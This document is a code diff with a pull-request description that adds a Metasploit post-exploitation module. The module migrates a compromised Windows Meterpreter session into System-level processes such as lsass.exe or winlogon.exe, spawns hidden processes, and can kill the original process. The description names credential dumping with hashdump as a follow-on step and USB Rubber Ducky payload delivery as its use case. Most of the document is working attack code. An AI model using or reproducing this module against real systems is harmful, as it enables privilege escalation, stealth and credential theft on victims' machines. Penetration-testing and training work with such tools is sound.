+         It will do everything it can to migrate, including spawing a new User level process.
+         For sessions with Admin rights: It will try to migrate into a System level process in the following
+         order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe.
+         If al these fail, it will fall back to User level migration. For sessions with User level rights:
+         It will try to migrate to a user level process, if that fails it will attempt to spawn the process
+         then migrate to it. It will attempt the User level processes in the following order:
+         NAME (if specified), explorer.exe, then notepad.exe.},
+      'License'       => MSF_LICENSE,
+      'Author'        => ['Josh Hale <jhale85446[at]gmail.com>'],
+      'Platform'      => ['win' ],
+      'SessionTypes'  => ['meterpreter' ]
+    ))
+
+    register_options(
+      [
+        OptString.new('ANAME', [false, 'System process to migrate to. For sessions with Admin rights. (See Module Description.)']),
+        OptString.new('NAME',  [false, 'Process to migrate to. For sessions with User rights. (See Module Description.)']),
+        OptBool.new(  'KILL',  [false, 'Kill original session process.', false])
+      ], self.class)
+  end
+
+  def run
+    # Populate target arrays
+    admin_targets = []
+    admin_targets << datastore['ANAME'] if datastore['ANAME']
+    admin_targets << "services.exe" << "winlogon.exe" << "wininit.exe" << "lsm.exe" << "lsass.exe"
+
+    user_targets = []
+    user_targets << datastore['NAME'] if datastore['NAME']
+    user_targets << "explorer.exe" << "notepad.exe"
+
+    # Get rights information
+    admin = is_admin? ? 'True' : 'False'
+    sys   = is_system? ? 'True' : 'False'
+
+    # Get current process information
+    original_pid = client.sys.process.open.pid
+    original_name = client.sys.process.open.name
+    print_status("Current session process is #{original_name} (#{original_pid}) as: #{client.sys.config.getuid}")
+
+    # Admin level migration starts here
+    if admin == 'True'
+      if sys == 'False'
+        print_status("Session is Admin but not System.")
+        print_status("Will attempt to migrate to a System level process.")
+      else
+        print_status("Session is already Admin and System.")
+        print_status("Will attempt to migrate to specified System level process.")
+      end
+
+      # Try to migrate to each of the System level processes in the list.  Stop when one works.  Go to User level migration if none work.
+      admin_targets.each do |target_name|
+        if migrate(get_pid(target_name), target_name)
+          kill(original_pid, original_name) if datastore['KILL']
+          return
+        end
+      end
+      print_error("Unable to migrate to any of the System level processes.")
+    else
+      print_status("Session has User level rights.")
+    end
+
+    # User level migration starts here
+    print_status("Will attempt to migrate to a User level process.")
+
+    # Try to migrate to user level processes in the list.  If it does not exist or cannot migrate, try spawning it then migrating.
+    user_targets.each do |target_name|
+      if migrate(get_pid(target_name), target_name)
+        kill(original_pid, original_name) if datastore['KILL']
+        return
+      end
+
+      if migrate(spawn(target_name), target_name)
+        kill(original_pid, original_name) if datastore['KILL']
+        return
+      end
+    end
+  end
+
+  # This function returns the first process id of a process with the name provided.
+  # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module.
+  def get_pid(proc_name)
+    processes = client.sys.process.get_processes
+    processes.each do |proc|
+      return proc['pid'] if proc['name'] == proc_name
+    end
+    return nil
+  end
+
+  # This function attempts to migrate to the specified process.
+  def migrate(target_pid, proc_name)
+    if !target_pid
+      print_error("Could not migrate to #{proc_name}.")
+      return false
+    end
+
+    begin
+      print_status("Trying #{proc_name} (#{target_pid})")
+      client.core.migrate(target_pid)
+      print_good("Successfully migrated to #{client.sys.process.open.name} (#{client.sys.process.open.pid}) as: #{client.sys.config.getuid}")
+      return true
+    rescue ::Exception => e
+      print_error("Could not migrate to #{proc_name}.")
+      print_error(e.to_s)
+      return false
+    end
+  end
+
+  # This function will attempt to spawn a new process of the type provided by the name.
+  def spawn(proc_name)
+    begin
+      print_status("Attempting to spawn #{proc_name}")
+      proc = session.sys.process.execute(proc_name, nil, {'Hidden' => true })
+      print_good("Successfully spawned #{proc_name}")
+      return proc.pid
+    rescue ::Exception => e
+      print_error("Could not spawn #{proc_name}.")
+      print_error(e.to_s)
+      return nil
+    end
+  end
+
+  # This function will try to kill the original session process
+  def kill(proc_pid, proc_name)
+    begin
+      print_status("Trying to kill original process #{proc_name} (#{proc_pid})")
+      session.sys.process.kill(proc_pid)
+      print_good("Successfully killed process #{proc_name} (#{proc_pid})")
+    rescue ::Exception => e
+      print_error("Could not kill original process #{proc_name} (#{proc_pid})")
+      print_error(e.to_s)
+    end
+  end
+end
+

--- a/modules/post/windows/manage/priv_migrate.rb
+++ b/modules/post/windows/manage/priv_migrate.rb
@@ -45,18 +45,14 @@ class Metasploit3 < Msf::Post
     user_targets << datastore['NAME'] if datastore['NAME']
     user_targets << "explorer.exe" << "notepad.exe"
 
-    # Get rights information
-    admin = is_admin? ? 'True' : 'False'
-    sys   = is_system? ? 'True' : 'False'
-
     # Get current process information
     original_pid = client.sys.process.open.pid
     original_name = client.sys.process.open.name
     print_status("Current session process is #{original_name} (#{original_pid}) as: #{client.sys.config.getuid}")
 
     # Admin level migration starts here
-    if admin == 'True'
-      if sys == 'False'
+    if is_admin?
+      if !is_system?
         print_status("Session is Admin but not System.")
         print_status("Will attempt to migrate to a System level process.")
       else

--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -210,7 +210,7 @@ class Msftidy
             warn("Please use 'US-CERT-VU' for '#{value}'")
           elsif value =~ /^https:\/\/wpvulndb\.com\/vulnerabilities\//
             warn("Please use 'WPVDB' for '#{value}'")
-          elsif value =~ /^http:\/\/packetstormsecurity\.com\/files\//
+          elsif value =~ /^https?:\/\/(?:[^\.]+\.)?packetstormsecurity\.(?:com|net|org)\//
             warn("Please use 'PACKETSTORM' for '#{value}'")
           end
         end


### PR DESCRIPTION
## Overview

This module will evaluate a Windows Meterpreter session's privileges and migrate accordingly. A session with Admin rights will be migrated to a System owned process as described below. A session with User rights will be migrated to a User level process as described below.  If a specified User level process is not running, it will spawn it then migrate.
## Background

The idea was to streamline scripted post exploitation migration to allow for immediate running of post modules that require System rights. The current "Smart Migrate" module attempts to migrate to explorer.exe as the current user first and does not take into account for privilege level. I have been working with a USB Rubber Ducky using a Vail Powershell Meterpreter payload as a training tool. If the USB Ducky is inserted into a computer where the current user has Admin rights, it will work through the UAC prompt and run the payload as Admin. If the user does not have Admin rights it will run the payload as a User. Since sessions could be coming in as either Admin or User, this module will make it easier for a proper automated migration. I attempted for a, more or less, no fail migration module.  It will try everything it can to migrate including spawning a new process. This can come in handy when the original process is short lived or needs to be shut down in a limited amount of time.
## Module options:
- ANAME: Allows for the specification of a System level process that the module will attempt to migrate to first if the session has Admin rights.
- NAME: Allows for the specification of a User level process that the module will attempt to migrate to first if the session has User rights, or if Admin migration fails through all of the default processes.  (See below)
- KILL: When set to TRUE, it will kill the original process after a successful migration.  (Default is FALSE)
## Module Process
- Retrieve the privilege information about the current session
- If session has Admin rights it will attempt to migrate to a System owned process in the following order:
  - ANAME (A module option, if specified)
  - services.exe
  - winlogon.exe
  - wininit.exe
  - lsm.exe
  - lsass.exe
- If it is unable to migrate to one of these processes it will drop to User level migration
- If session has User rights it will attempt to migrate to a User owned process in the below order.  If it cannot migrate, it will attempt to spawn the process and migrate to it.
  - NAME (A module option, if specified)
  - explorer.exe
  - notepad.exe
## Testing methods:
- Open a Meterpreter session with Admin rights but not System rights, run the module.
  - Then run another module that requires System rights such as hashdump.
- Open a Meterpreter session with User only rights, run the module.
- Do the above for different versions of Windows.
- Enter process names (or bad values) into NAME and ANAME, and test described above.
- Set KILL to true and test.
#### Tested on:
- Win 10 Pro
- Win 7 Pro
- Win XP SP3
- Win Server 2012
- Win Server 2008 R2
## Screen Shots
#### Admin migration to "services.exe"

![shot1](https://cloud.githubusercontent.com/assets/12484685/11987754/85b6c72a-a9aa-11e5-95f7-e7beb64f197f.jpg)
#### Admin migration to specified target process.

![shot1a](https://cloud.githubusercontent.com/assets/12484685/11987776/c6f2fce0-a9aa-11e5-8603-3ed7047e3fe5.jpg)
#### Migration to "winlogon.exe" after "services.exe" was unavailable.

![shot2](https://cloud.githubusercontent.com/assets/12484685/11987786/0e9717f2-a9ab-11e5-8a1b-89a4e0cef40a.jpg)
#### User migration to explorer.exe

![shot3](https://cloud.githubusercontent.com/assets/12484685/11987798/3c96ae56-a9ab-11e5-8c98-95ff371804f1.jpg)
#### User migration to specified target process.  Then migration with KILL=true.

![shot4](https://cloud.githubusercontent.com/assets/12484685/11987808/71b124ea-a9ab-11e5-957f-75aad5f9485b.jpg)
#### Example of scripted post modules where System is required.

![shot5](https://cloud.githubusercontent.com/assets/12484685/11987825/c36b2b0a-a9ab-11e5-93d2-1c2d8cdaac81.jpg)
